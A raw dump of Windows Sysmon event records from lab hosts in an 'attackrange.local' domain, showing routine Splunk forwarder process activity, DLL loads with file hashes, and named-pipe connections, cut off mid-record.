12:17:11.056{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219615Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219614Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-5432-6143-0500-00000000F101}412428C:\Windows\system32\csrss.exe{AD5E2759-5B47-618E-0DCE-08000000F101}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219613Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B47-618E-0DCE-08000000F101}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219612Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.041{AD5E2759-5B47-618E-0DCE-08000000F101}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057345703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.796{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.796{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.796{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.796{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057345699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.617{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057345662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057345661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:11.595{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B47-618E-45F3-04000000F101}5404C:\Program 